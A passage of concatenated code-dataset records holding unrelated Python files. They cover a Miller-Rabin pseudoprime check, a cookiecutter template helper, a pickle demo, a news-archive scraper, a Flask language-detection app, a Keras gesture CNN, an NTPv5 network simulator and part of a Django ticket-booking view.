\r\ndef isPrime( n, k): \r\n\t\r\n\t# corner cases \r\n\tif (n <= 1 or n == 4): \r\n\t\treturn False; \r\n\tif (n <= 3): \r\n\t\treturn True; \r\n\r\n\t# Find odd d such that n - 1 = 2^r * d for some r >= 1 \r\n\td = n - 1; \r\n\twhile (d % 2 == 0): \r\n\t\td //= 2; \r\n\r\n\t# Repeat the test the given number 'k' of times \r\n\tfor i in range(k): \r\n\t\tif (millerTest(d, n) == False): \r\n\t\t\treturn False; \r\n\r\n\treturn True; \r\n\r\n# Number of iterations for accuracy\r\nk = 4; \r\n\r\nmiller_primes = set()\r\n\r\n# Checking all numbers for probable primality with the Rabin-Miller test\r\nfor n in range(1,100000): \r\n\tif (isPrime(n, k)): \r\n\t\tmiller_primes.add(n)\r\n\r\n#Set subtraction between the Rabin-Miller probable primes and the real primes\r\npseudoprimes = miller_primes - prime_set\r\n\r\nprint(\"PSEUDOPRIMES : {}\".format(pseudoprimes))\r\n", "repo_name": "ArvindOkram/Attacks-and-Cryptography-Algorithms", "sub_path": "Cryptography Algorithms Implementation/Raben Milleer.py", "file_name": "Raben Milleer.py", "file_ext": "py", "file_size_in_byte": 2664, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sympy.primerange", "line_number": 20, "usage_type": "call"}]} +{"seq_id": "29383923321", "text": "import abc\nimport os\n\nimport cookiecutter\nimport cookiecutter.main\n\nfrom molecule import logger\n\nLOG = logger.get_logger(__name__)\n\n\nclass Base(object):\n    __metaclass__ = abc.ABCMeta\n\n    def _process_templates(self,\n                           template_dir,\n                           extra_context,\n                           output_dir,\n                           overwrite=True):\n        \"\"\"\n        Process templates as found in the named directory.\n\n        :param template_dir: A string containing an absolute or relative path\n        to a directory where the templates are located. If the provided\n        directory is a relative path, it is resolved using a known location.\n        :param extra_context: A dict of values that are used to override\n        default or user specified values.\n        :param output_dir: A string with an absolute path to a directory where\n        the templates should be written to.\n        :param overwrite: An optional bool whether or not to overwrite existing\n        templates.\n        :return: None\n        \"\"\"\n        template_dir = self._resolve_template_dir(template_dir)\n\n        cookiecutter.main.cookiecutter(\n            template_dir,\n            extra_context=extra_context,\n            output_dir=output_dir,\n            overwrite_if_exists=overwrite,\n            no_input=True,\n        )\n\n    def _resolve_template_dir(self, template_dir):\n        if not os.path.isabs(template_dir):\n            template_dir = os.path.join(\n                os.path.dirname(__file__), os.path.pardir, os.path.pardir,\n                'cookiecutter', template_dir)\n\n        return template_dir\n", "repo_name": "amitvashist7/ansible-development-CTS", "sub_path": "molecule/my_env/lib/python2.7/site-packages/molecule/command/init/base.py", "file_name": "base.py", "file_ext": "py", "file_size_in_byte": 1635, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "61", "api": [{"api_name": "molecule.logger.get_logger", "line_number": 9, "usage_type": "call"}, {"api_name": "molecule.logger", "line_number": 9, "usage_type": "name"}, {"api_name": "abc.ABCMeta", "line_number": 13, "usage_type": "attribute"}, {"api_name": "cookiecutter.main.cookiecutter", "line_number": 36, "usage_type": "call"}, {"api_name": "cookiecutter.main", "line_number": 36, "usage_type": "attribute"}, {"api_name": "os.path.isabs", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path", "line_number": 45, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 46, 
"usage_type": "call"}, {"api_name": "os.path", "line_number": 46, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 47, "usage_type": "call"}, {"api_name": "os.path", "line_number": 47, "usage_type": "attribute"}]} +{"seq_id": "4876444349", "text": "#!/usr/bin/env python3\n# -*- coding: UTF-8 -*-\n\n'''\n\n@File : use_pickle.py \n@Author : jiachen.zou@jiiov.com \n@Date : 2021-03-31 11:27 CST(+0800) \n@Brief : \n\n'''\n\nimport pickle\nfrom io import BytesIO\n\nclass MyData:\n def __init__( self, data):\n self.data = data\n def who_am_i( self):\n print( self, self.data)\n\nobj = MyData( 456)\nobj.who_am_i()\n\n# Serialize:\nfile = BytesIO()\npickle.dump( obj, file)\nprint( 'serialized into %d bytes:' % ( len( file.getvalue())))\nprint( \" \".join( \"%02x\" % byte for byte in bytes( file.getvalue())))\n\n# Unserialize\nprint( 'unserialized:')\nfile.seek( 0)\nnew_obj = pickle.load( file)\nnew_obj.who_am_i()\n\n\n\n# End of 'use_pickle.py' \n\n", "repo_name": "alexander-zou/pycheats", "sub_path": "pyps/use_pickle.py", "file_name": "use_pickle.py", "file_ext": "py", "file_size_in_byte": 692, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "io.BytesIO", "line_number": 26, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 27, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 34, "usage_type": "call"}]} +{"seq_id": "28839354402", "text": "# use for lang - en,hi,mr\nimport pandas as pd\nimport config\nimport time\nimport os\nimport calendar\nfrom pathlib import Path\nfrom argparse import ArgumentParser\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support.ui import Select\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\n\nlang_dict = {'en':'english','hi':'hindi','kn':'kannada','te':'telugu','ml':'malayalam','ta':'tamil','mr':'marathi'}\n\ndef create_directory(path):\n\ttry:\n\t\tPath(path).mkdir(parents=True, exist_ok=True)\n\t\treturn True\n\texcept FileExistsError as fe_error:\n\t\treturn True\n\texcept OSError as error:\n\t\tprint(error)\n\treturn False\n\n\ndef get_driver(web_browser=\"chrome\"):\n\tif web_browser == \"chrome\":\n\n\t\toptions = webdriver.chrome.options.Options()\n\t\toptions.add_argument(\"--headless\")\n\t\toptions.add_argument(\"--disable-application-cache\")\n\t\toptions.add_argument(\"--disable-extensions\")\n\t\toptions.add_argument(\"--start-maximized\")\n\t\toptions.add_argument(\"--log-level=3\")\n\t\tprefs = {\n\t\t\t\"profile.password_manager_enabled\": False,\n\t\t\t\"credentials_enable_service\": False,\n\t\t}\n\t\toptions.add_experimental_option(\"prefs\", prefs)\n\t\toptions.add_experimental_option(\n\t\t\t\"excludeSwitches\", [\"load-extension\", \"enable-automation\", \"enable-logging\"]\n\t\t)\n\t\tdriver = webdriver.Chrome(config.CHROME_DRIVER_PATH, options=options)\n\t\treturn driver\n\telse:\n\t\tprint(\"Currently only support chrome driver\")\n\t\treturn None\n\ndef link_prepare(lang,month,year,archivelist=False):\n\n\tmonth_code=time.strptime(month,'%B').tm_mon\n\tmonth_code=\"{:02d}\".format(month_code)\n\n\tlink=\"\"\n\tif lang==\"en\":\n\t\tlink+=\"https://timesofindia.indiatimes.com/archive/year-\"+year+\",month-\"+month_code+\".cms\"\n\tif 
lang==\"mr\":\n\t\tlink+=\"https://maharashtratimes.com/archive.cms?year=\"+year+\"&month=\"+month_code\n\tif lang==\"hi\":\n\t\tlink+=\"https://navbharattimes.indiatimes.com/archive/year-\"+year+\",month-\"+month_code+\".cms\"\n\tif archivelist==True:\n\t\tif lang!= 'mr':\n\t\t\tlink=link[:-4]\n\t\tlink=link.replace('archive','archivelist')\n\t\tif lang=='mr' :\n\t\t\tlink+=\"&starttime=\"\n\t\telse:\n\t\t\tlink+=\",starttime-\"\n\treturn link\n\ndef first_count(link,lang):\n\tif lang == 'mr' :\n\t\tfc=link.split('=')\n\t\tfc=fc[-1]\n\telse :\n\t\tfc=link.split('-')\n\t\tfc=fc[-1]\n\t\tfc=fc[:-4]\n\treturn int(fc)\n\ndef xpath(lang):\n\tif lang == 'en':\n\t\treturn \"/html/body/div[1]/table[2]/tbody/tr[2]/td[1]//a\"\n\tif lang == 'mr':\n\t\treturn \"//div[@class='leftmain']//a\"\n\tif lang == 'hi':\n\t\treturn \"//div[@class='normtxt']//a\"\n\ndef write_link_month(lang,year, month, driver, out_dir,log): \n\n\tlink=link_prepare(lang,month,year)\n\n\tmonth_code=time.strptime(month,'%B').tm_mon\n\tmonth_code=\"{:02d}\".format(month_code)\n\tlast_date= calendar.monthrange(int(year),int(month_code))[1]\n\n\tdriver.get(link)\n\ttime.sleep(3)\n\tentries = driver.find_elements_by_xpath(\"//table[@id='calender']//a\")\n\tfirst_link=\"\"\n\tfor ent in entries:\n\t\tif ent.text == '1':\n\t\t\tfirst_link=ent.get_attribute('href')\n\t\t\tbreak\n\tcount=first_count(first_link,lang)\n\n\tdata_table = pd.DataFrame(columns=[\"Headline\",\"Datetime\", \"Link\"])\n\n\tif log : print(\"\\n----------------\",year, month, lang_dict[lang],\"----------------\\n\")\n\n\tfor day in range(1,last_date+1):\n\t\tday=\"{:02d}\".format(day)\n\t\tdate= str(year) + \"/\" + str(month_code) + \"/\" + str(day)\n\t\tday_link = link_prepare(lang,month,year,archivelist=True)+str(count)+\".cms\"\n\t\tif lang==\"mr\":\n\t\t\tday_link=day_link[:-4]\n\n\t\tdriver.get(day_link)\n\t\t#time.sleep(3)\n\t\tentries = driver.find_elements_by_xpath(xpath(lang))\n\n\t\tif log : print(f\"{date} - {len(entries)} entries ... \",end='')\n\t\t\n\t\tfor ent in entries :\n\t\t\theadline = ent.text\n\t\t\t#/html/body/div[6]/div[11]/div[1]/div[3]/table/tbody/tr[1]/td[1]/span/a[1]\n\t\t\t#en-/html/body/div[1]/table[2]/tbody/tr[2]/td[1]\n\t\t\t#mr-/html/body/div[6]/div[11]/div[1]/div[3]/table/tbody/tr[1]\n\t\t\t#hi-/html/body/div[6]/div[8]/div[1]/table/tbody/tr[2]\n\t\t\thlink = ent.get_attribute(\"href\")\n\t\t\tdata_table = data_table.append({\"Headline\": headline,\"Datetime\": date ,\"Link\": hlink},ignore_index=True,)\n\n\t\tif log : print(\"Appended Successfully\")\n\t\tcount+=1\n\tif not os.path.exists(out_dir):\n\t\tcreate_directory(out_dir)\n\tdata_table.drop_duplicates(subset=[\"Link\"], inplace=True)\n\tdata_table.to_csv(\n\t\tos.path.join(out_dir, f\"TOI_{lang_dict[lang]}_{month.lower()}_{year}.csv\"),\n\t\tencoding=config.CSV_FILE_ENCODING,\n\t\tindex=False,\n\t)\n\tprint(f\"\\nFile TOI_{lang_dict[lang]}_{month.lower()}_{year}.csv is committed with {data_table.shape[0]} entries. 
\\n\")\n\treturn\n\n\n\n\ndef main():\n\tparser = ArgumentParser()\n\tparser.add_argument(\"--log\", help=\"will print log\",action=\"store_true\")\n\tparser.add_argument(\"--output-dir\", help=\"output directory\", type=str, default=\"\")\n\tparser.add_argument(\"--lang-code\", help=\"Language Code - mr,hi,en\", type=str, required=True)\n\tparser.add_argument(\"--year\", help=\"Year in YYYY format\", type=str, required=True)\n\tparser.add_argument(\"--month\", help=\"Month \", type=str, required=True)\n\targs = parser.parse_args()\n\tlog=args.log\n\tn_lang=args.lang_code\n\tn_year=args.year\n\tpass_month=args.month\n\tsave_csv_dir = args.output_dir\n\tif len(save_csv_dir)==0 : save_csv_dir=\"article_list/\"+str(n_year)+\"/\"+str(pass_month)+\" \"+str(n_year)+\"/\"\n\tdriver = get_driver()\n\twrite_link_month(n_lang,n_year, pass_month, driver, save_csv_dir,log) \n\tdriver.close()\n\tdriver.quit()\n\nif __name__ == \"__main__\":\n\tmain()\n", "repo_name": "project-anuvaad/anuvaad-corpus-tools", "sub_path": "timesofindia-crawler/generate_article_list.py", "file_name": "generate_article_list.py", "file_ext": "py", "file_size_in_byte": 5373, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pathlib.Path", "line_number": 20, "usage_type": "call"}, {"api_name": "selenium.webdriver.chrome.options.Options", "line_number": 32, "usage_type": "call"}, {"api_name": "selenium.webdriver.chrome", "line_number": 32, "usage_type": "attribute"}, {"api_name": "selenium.webdriver", "line_number": 32, "usage_type": "name"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 46, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 46, "usage_type": "name"}, {"api_name": "config.CHROME_DRIVER_PATH", "line_number": 46, "usage_type": "attribute"}, {"api_name": "time.strptime", "line_number": 54, "usage_type": "call"}, {"api_name": "time.strptime", "line_number": 96, "usage_type": "call"}, {"api_name": "calendar.monthrange", "line_number": 98, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 101, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 110, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 138, "usage_type": "call"}, {"api_name": "os.path", "line_number": 138, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 142, "usage_type": "call"}, {"api_name": "os.path", "line_number": 142, "usage_type": "attribute"}, {"api_name": "config.CSV_FILE_ENCODING", "line_number": 143, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 153, "usage_type": "call"}]} +{"seq_id": "536269170", "text": "import re\nimport pickle\nfrom flask import Flask, request, jsonify, render_template\nimport pandas as pd\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.metrics import accuracy_score, confusion_matrix, classification_report\n\n# Load the dataset\nlanguage = pd.read_csv('Language Detection.csv')\n\n# Preprocess the text data\nX = language[\"Text\"]\ny = language[\"Language\"]\nle = LabelEncoder()\ny = le.fit_transform(y)\ntext_list = []\nfor text in X:\n text = re.sub(r'[!@#$(),n\"%^*?:;~`0-9]', ' ', text)\n text = re.sub(r'[[]]', ' ', text)\n text = text.lower()\n text_list.append(text)\n\n# Vectorize the text data\ncv = CountVectorizer()\nX = 
cv.fit_transform(text_list).toarray()\n\n# Split the data into train and test sets\nx_train, x_test, y_train, y_test = train_test_split(X, y, test_size = 0.20)\n\n# Train the model\nmodel = MultinomialNB()\nmodel.fit(x_train, y_train)\n\n# Predict on the test set and calculate accuracy\ny_prediction = model.predict(x_test)\naccuracy = accuracy_score(y_test, y_prediction)\nconfusion_m = confusion_matrix(y_test, y_prediction)\nprint(\"The accuracy is :\",accuracy)\n\n# Save the model and vectorizer to disk\npickle.dump(model, open(\"model.pkl\", \"wb\"))\npickle.dump(cv, open(\"vectorizer.pkl\", \"wb\"))\n\n# Load the model and vectorizer in the Flask app\napp = Flask(__name__)\nmodel = pickle.load(open('model.pkl', 'rb'))\ncv = pickle.load(open('vectorizer.pkl', 'rb'))\n\n# Define the predict function\n@app.route('/predict',methods=['POST'])\ndef predict():\n # Get the text from the POST request\n text = request.json['text']\n \n # Preprocess the text\n text = re.sub(r'[!@#$(),n\"%^*?:;~`0-9]', ' ', text)\n text = re.sub(r'[[]]', ' ', text)\n text = text.lower()\n \n # Vectorize the text\n text_vectorized = cv.transform([text]).toarray()\n \n # Make the prediction\n prediction = model.predict(text_vectorized)\n \n # Reverse the label encoding\n predicted_language = le.inverse_transform(prediction)[0]\n \n # Return the predicted language\n return jsonify({'language': predicted_language})\n\n# Define the home page\n@app.route('/')\ndef home():\n return render_template('index.html')\n\n# Run the app\nif __name__ == '__main__':\n app.run(debug=True)", "repo_name": "Avdhoot-Santosh-Sawant/Machine-Learning-Language-Identification-Project", "sub_path": "language detection ml project/app2.py", "file_name": "app2.py", "file_ext": "py", "file_size_in_byte": 2393, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pandas.read_csv", "line_number": 12, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.LabelEncoder", "line_number": 17, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 21, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 22, "usage_type": "call"}, {"api_name": "sklearn.feature_extraction.text.CountVectorizer", "line_number": 27, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 31, "usage_type": "call"}, {"api_name": "sklearn.naive_bayes.MultinomialNB", "line_number": 34, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 39, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 40, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 44, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 45, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 48, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 49, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 50, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 56, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 56, "usage_type": "name"}, {"api_name": "re.sub", "line_number": 59, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 60, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 73, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 78, "usage_type": "call"}]} +{"seq_id": "40611375372", "text": 
"\"\"\"\nhttp://www.cnblogs.com/aoru45/p/9748475.html\nhttps://github.com/asingh33/CNNGestureRecognizer\nhttps://keras.io/backend/#function\n\"\"\"\nimport numpy as np\nimport pandas as pd\nfrom sklearn.utils import shuffle\nimport random\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Activation, Flatten\nfrom keras.layers import Conv2D, MaxPooling2D, ZeroPadding2D\nfrom keras.optimizers import SGD, RMSprop, adam\nfrom keras.utils.np_utils import to_categorical\nfrom keras.utils import plot_model\nfrom keras import backend as K\nK.backend()\nimport tensorflow as tf\nfrom PIL import Image\nimport os\nimport sys\nimport time\n\ndef loadCNN():\n\tglobal get_output\n\tmodel = Sequential()\n\tmodel.add(Conv2D(32,(5,5), padding=\"valid\", input_shape=(300,300,1)))\n\tconvout1 = Activation(\"relu\")\n\tmodel.add(convout1)\n\tmodel.add(MaxPooling2D(pool_size=(2,2)))\n\tmodel.add(Conv2D(64,(3,3)))\n\tconvout2 = Activation(\"relu\")\t\n\tmodel.add(convout2)\n\tmodel.add(MaxPooling2D(pool_size=(2,2)))\n\tmodel.add(Conv2D(64,(5,5)))\n\tconvout3 = Activation(\"relu\")\n\tmodel.add(convout3)\n\tmodel.add(MaxPooling2D(pool_size=(2,2)))\n\tmodel.add(Conv2D(64,(5,5)))\n\tconvout4 = Activation(\"relu\")\n\tmodel.add(convout4)\n\tmodel.add(MaxPooling2D(pool_size=(2,2)))\n\tmodel.add(Dropout(0.5))\n\tmodel.add(Flatten())\n\tmodel.add(Dense(512))\n\tmodel.add(Activation(\"relu\"))\n\tmodel.add(Dropout(0.5))\n\tmodel.add(Dense(128))\n\tmodel.add(Activation(\"relu\"))\n\tmodel.add(Dropout(0.5))\n\tmodel.add(Dense(3))\n\tmodel.add(Activation(\"softmax\"))\n\tmodel.compile(loss = \"categorical_crossentropy\", optimizer = \"adadelta\", metrics = ['accuracy'])\n\tmodel.summary()\n\tconfig = model.get_config()\n\tlayer = model.layers[11]\n\tget_output = K.function([model.layers[0].input, K.learning_phase()], [layer.output,])\n\treturn model\n\ndef initializers():\n\tx_data = []\n\ty_data = []\n\tfor i in range(3):\n\t\timglist = os.listdir('./train1/' + str(i))\n\t\tfor item in imglist:\n\t\t\timg = Image.open('./train1/' + str(i) +'/'+ item)\n\t\t\timg = np.array(img)\n\t\t\tx_data.append(img)\n\t\t\ty_data.append(i)\n\tx_data = np.array(x_data,dtype='f')\n\tx_data = x_data/255.0 \n\ty_data = np.array(y_data)\n\t#print(x_data.shape)\n\t#print(y_data.shape)\n\ty_data = to_categorical(y_data, num_classes=3)\n\tx_data, y_data = shuffle(x_data, y_data, random_state=2)\n\tx_data = x_data.reshape([-1, 300, 300, 1])\n\tprint(x_data.shape)\n\tprint(y_data.shape)\n\treturn x_data, y_data\n\t\nif __name__ == '__main__':\n\tx_data, y_data = initializers()\n\tmodel = loadCNN()\n\tprint(\"Training start: \" + time.asctime(time.localtime(time.time())))\n\thist = model.fit(x_data, y_data, batch_size = 32, epochs = 5, verbose = 1, validation_split = 0.1)\n\tmodel.save_weights('./model/model_3.hdf5', overwrite = True)\n\tprint(\"Training end: \" + time.asctime(time.localtime(time.time())))\n\n", "repo_name": "xiaoral2/Deep-Learning-by-Using-MapReduce-", "sub_path": "gesrecog.py", "file_name": "gesrecog.py", "file_ext": "py", "file_size_in_byte": 2748, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "keras.backend.backend", "line_number": 17, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 17, "usage_type": "name"}, {"api_name": "keras.models.Sequential", "line_number": 26, "usage_type": "call"}, {"api_name": "keras.layers.Conv2D", "line_number": 27, "usage_type": "call"}, {"api_name": 
"keras.layers.Activation", "line_number": 28, "usage_type": "call"}, {"api_name": "keras.layers.MaxPooling2D", "line_number": 30, "usage_type": "call"}, {"api_name": "keras.layers.Conv2D", "line_number": 31, "usage_type": "call"}, {"api_name": "keras.layers.Activation", "line_number": 32, "usage_type": "call"}, {"api_name": "keras.layers.MaxPooling2D", "line_number": 34, "usage_type": "call"}, {"api_name": "keras.layers.Conv2D", "line_number": 35, "usage_type": "call"}, {"api_name": "keras.layers.Activation", "line_number": 36, "usage_type": "call"}, {"api_name": "keras.layers.MaxPooling2D", "line_number": 38, "usage_type": "call"}, {"api_name": "keras.layers.Conv2D", "line_number": 39, "usage_type": "call"}, {"api_name": "keras.layers.Activation", "line_number": 40, "usage_type": "call"}, {"api_name": "keras.layers.MaxPooling2D", "line_number": 42, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 43, "usage_type": "call"}, {"api_name": "keras.layers.Flatten", "line_number": 44, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 45, "usage_type": "call"}, {"api_name": "keras.layers.Activation", "line_number": 46, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 47, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 48, "usage_type": "call"}, {"api_name": "keras.layers.Activation", "line_number": 49, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 50, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 51, "usage_type": "call"}, {"api_name": "keras.layers.Activation", "line_number": 52, "usage_type": "call"}, {"api_name": "keras.backend.function", "line_number": 57, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 57, "usage_type": "name"}, {"api_name": "keras.backend.learning_phase", "line_number": 57, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 64, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 66, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 66, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 72, "usage_type": "call"}, {"api_name": "keras.utils.np_utils.to_categorical", "line_number": 75, "usage_type": "call"}, {"api_name": "sklearn.utils.shuffle", "line_number": 76, "usage_type": "call"}, {"api_name": "time.asctime", "line_number": 85, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 85, "usage_type": "call"}, {"api_name": "time.time", "line_number": 85, "usage_type": "call"}, {"api_name": "time.asctime", "line_number": 88, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 88, "usage_type": "call"}, {"api_name": "time.time", "line_number": 88, "usage_type": "call"}]} +{"seq_id": "25674157892", "text": "import argparse\nimport logging\nimport select\nimport sys\nimport time\n\nimport ntpnode\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Test NTPv5 nodes in simulated network.\")\n parser.add_argument(\"primary_nodes\", help=\"number of stratum=1 nodes\", type=int)\n parser.add_argument(\"secondary_nodes\", help=\"number of stratum>1 nodes\", type=int)\n parser.add_argument(\"topology\", help=\"network topology of stratum>1 nodes (chain, uniring, biring, mesh)\")\n parser.add_argument(\"-p\", \"--first-port\", dest=\"first_port\", 
metavar=\"PORT\", type=int,\n default=10123, help=\"specify port of first node (default 10123)\")\n parser.add_argument(\"-v\", \"--version\", dest=\"version\", metavar=\"VERSION\", type=int,\n default=0, help=\"specify client NTP version (default negotiation)\")\n parser.add_argument(\"-i\", \"--poll\", dest=\"poll\", type=int,\n default=0, help=\"specify polling interval in log2 seconds (default 0)\")\n parser.add_argument(\"-s\", \"--stop\", dest=\"stop_polls\", metavar=\"POLLS\", type=int,\n default=0, help=\"stop after POLLS identical selections\")\n parser.add_argument(\"-f\", \"--refids-fragments\", dest=\"refids_fragments\", metavar=\"NUMBER\", type=int,\n default=4, help=\"specify number of Bloom filter fragments (default 4)\")\n parser.add_argument(\"-r\", \"--dispersion-rate\", dest=\"dispersion_rate\", metavar=\"RATE\", type=float,\n default=5e-3, help=\"specify dispersion rate (default 5e-3)\")\n parser.add_argument(\"-m\", \"--max-distance\", dest=\"max_distance\", metavar=\"DIST\", type=float,\n default=1e-1, help=\"specify dispersion rate (default 1e-1)\")\n parser.add_argument(\"-d\", \"--debug\", dest=\"debug\", action=\"count\",\n default=0, help=\"increase debug level\")\n\n args = parser.parse_args()\n\n logging.basicConfig(format=\"%(message)s\")\n logging.getLogger().setLevel([logging.WARN, logging.INFO, logging.DEBUG][args.debug])\n\n nodes = []\n\n print(\"Network:\")\n\n for i in range(args.primary_nodes):\n nodes.append(ntpnode.NtpNode(True, args.first_port + i, args.max_distance, args.dispersion_rate,\n False, [], args.version, args.poll, False, args.refids_fragments))\n print(\" {}\".format(i))\n\n for i in range(args.secondary_nodes):\n servers=[]\n ids=[]\n for j in range(args.secondary_nodes):\n if args.topology == \"chain\":\n if i - 1 != j:\n continue\n elif args.topology == \"uniring\":\n if i not in (j + 1, j - args.secondary_nodes + 1):\n continue\n elif args.topology == \"biring\":\n if i not in (j - 1, j + 1, j - args.secondary_nodes + 1, j + args.secondary_nodes - 1):\n continue\n elif args.topology == \"mesh\":\n if i == j:\n continue\n else:\n logging.error(\"Unknown topology\")\n sys.exit(1)\n servers.append(\"127.0.0.1:{}\".format(args.first_port + args.primary_nodes + j))\n ids.append(args.primary_nodes + j)\n if i < args.primary_nodes:\n servers.append(\"127.0.0.1:{}\".format(args.first_port + i))\n ids.append(i)\n\n print(\" {} <- {}\".format(args.primary_nodes + i, ids))\n\n nodes.append(ntpnode.NtpNode(False, args.first_port + args.primary_nodes + i, args.max_distance,\n args.dispersion_rate,\n True, servers, args.version, args.poll, False, args.refids_fragments))\n\n last_sels = []\n unchanged_sels = 0\n start_time = time.monotonic()\n\n while True:\n descriptors = []\n timeout = 1e10\n for node in nodes:\n timeout = min(timeout, node.get_timeout())\n descriptors += node.get_descriptors()\n\n rlist, _, _ = select.select(descriptors, [], [], timeout)\n\n for node in nodes:\n node.process_events(wait=False)\n\n if not rlist:\n print(\"Selection at {:.1f}:\".format(time.monotonic() - start_time))\n\n sels = []\n for i, node in enumerate(nodes):\n ids = [s[1] - args.first_port for s in node.selected_sources]\n sels.append(set(ids))\n print(\" {} <- {}\".format(i, ids))\n\n looped = []\n for i in range(len(nodes)):\n visited = sels[i]\n while True:\n prev_len = len(visited)\n for j in list(visited):\n visited |= sels[j]\n if i in visited:\n looped.append(i)\n break\n if prev_len == len(visited):\n break\n\n print(\"Looped nodes: 
{}\".format(looped))\n\n if sels == last_sels:\n unchanged_sels += 1\n if args.stop_polls > 0 and unchanged_sels >= args.stop_polls:\n break\n else:\n unchanged_sels = 0\n last_sels = sels\n", "repo_name": "mlichvar/ntp5-exp", "sub_path": "network.py", "file_name": "network.py", "file_ext": "py", "file_size_in_byte": 5221, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 10, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 33, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 34, "usage_type": "call"}, {"api_name": "logging.WARN", "line_number": 34, "usage_type": "attribute"}, {"api_name": "logging.INFO", "line_number": 34, "usage_type": "attribute"}, {"api_name": "logging.DEBUG", "line_number": 34, "usage_type": "attribute"}, {"api_name": "ntpnode.NtpNode", "line_number": 41, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 62, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 63, "usage_type": "call"}, {"api_name": "ntpnode.NtpNode", "line_number": 72, "usage_type": "call"}, {"api_name": "time.monotonic", "line_number": 78, "usage_type": "call"}, {"api_name": "select.select", "line_number": 87, "usage_type": "call"}, {"api_name": "time.monotonic", "line_number": 93, "usage_type": "call"}]} +{"seq_id": "28835776761", "text": "from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom . models import movie,ticket\nfrom datetime import datetime\n# Create your views here.\ndef index (requests):\n movies = movie.objects.all()\n return render(requests,'index.html',{'movies':movies})\n\ndef bookt(requests):\n movie1=requests.GET['movie']\n booking=int(requests.GET['booking'])\n nos=int(requests.GET['nos'])\n username=requests.GET['name']\n phone=requests.GET['phone']\n booking=booking-nos\n book_time=datetime.now()\n ticket1 = ticket.objects.create(movie=movie1, book_time=book_time,user=username,phone=phone,nos=nos)\n movie.objects.filter(name=movie1).update(bookings=booking)\n obj= ticket.objects.get(movie=movie1, book_time=book_time,user=username,phone=phone,nos=nos)\n id=obj.id\n return render(requests,'booked.html',{'obj':obj})\n\ndef delt(requests):\n ticketid=requests.GET['id']\n movie2=requests.GET['movienm']\n obj = movie.objects.get(name=movie2)\n booking=int(obj.bookings)\n nos=int(requests.GET['nos'])\n username=requests.GET['username']\n phone=requests.GET['phone']\n book=booking+nos\n objt=ticket.objects.get(id=ticketid,user=username,phone=phone)\n print(objt.nos)\n left=objt.nos-nos\n if(left>0):\n movie.objects.filter(name=movie2).update(bookings=book)\n 